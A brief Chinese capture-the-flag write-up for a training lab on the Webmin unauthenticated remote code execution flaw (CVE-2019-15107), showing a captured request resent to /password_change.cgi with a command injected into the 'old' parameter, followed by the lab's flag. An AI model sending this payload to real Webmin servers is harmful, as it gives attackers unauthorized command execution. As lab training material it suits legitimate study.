墨者学院 Webmin未经身份验证的远程代码执行

(CVE-2019-15107)

b4c0321e49c4d281.png

了解漏洞后我们打开题目

随便输入用户名和密码

346e905a9d044bac.png

然后抓包

ff6cdffea784b904.png

将请求包发送到repeater模块,然后请求/password_change.cgi

post请求的数据改为

payload:

1
user=yeyu&pam=1&expired=2&old=ls /&new1=1111&new2=1111

然后我们发包

fbe03d187e35f770.png

出现回显,还有key.txt 文件我们 查看

可以查看到

579b9912f693e820.png

1
mozhe232711867abecd641b9aeaf2adb

aa03107fa587d022.png

问题解决